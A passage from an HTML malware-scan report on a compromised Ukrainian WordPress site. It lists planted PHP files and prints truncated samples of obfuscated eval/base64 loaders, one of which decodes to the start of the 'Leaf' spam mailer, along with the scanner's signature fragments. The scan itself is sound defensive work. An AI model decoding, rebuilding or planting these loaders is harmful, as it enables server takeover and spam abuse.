<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$YoKrR</span><span style="color: #007700">(</span><span style="color: #0000BB">$icyYU</span><span style="color: #007700">(</span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIG...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_177").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/xvzod.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 216.49 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 18:34:33</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 18:34:33</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 21</span><br><table id="file_178" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICAgfQogICAgZWxzZSB7CiA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 162cf671 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 162cf671)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">hcnJheV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 407651f7 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 407651f7)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">wcmludG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">aW5jbHVkZ</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7186bb8d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7186bb8d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RfUE9TV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">N0cl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7f5d33bf <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7f5d33bf)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">JF9SRVFVRVNU</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">leGVjK</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">pbmNsdWRl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">c3Rhd</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3Blb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Z1bmN0aW9u</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VjaG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign e6546205 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: e6546205)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">kX1BPU1</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ee1cb326 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ee1cb326)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">9wZW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ff4f5344 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ff4f5344)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FycmF5X</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_178").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/gFcY6Eo2RT8.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 166.77 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:25:06</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:25:06</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 286</span><br><table id="file_179" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1004</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1006</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1015</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1056</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'cc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1082</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addBCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'bcc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1093</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addReplyTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'Reply-To'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function), </span><span style="color: #0000BB">addition of such addresses is delayed until send</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">do </span><span style="color: #0000BB">not </span><span style="color: #007700">throw </span><span style="color: #0000BB">exceptions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1110</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'addAnAddress'</span><span style="color: #007700">), </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
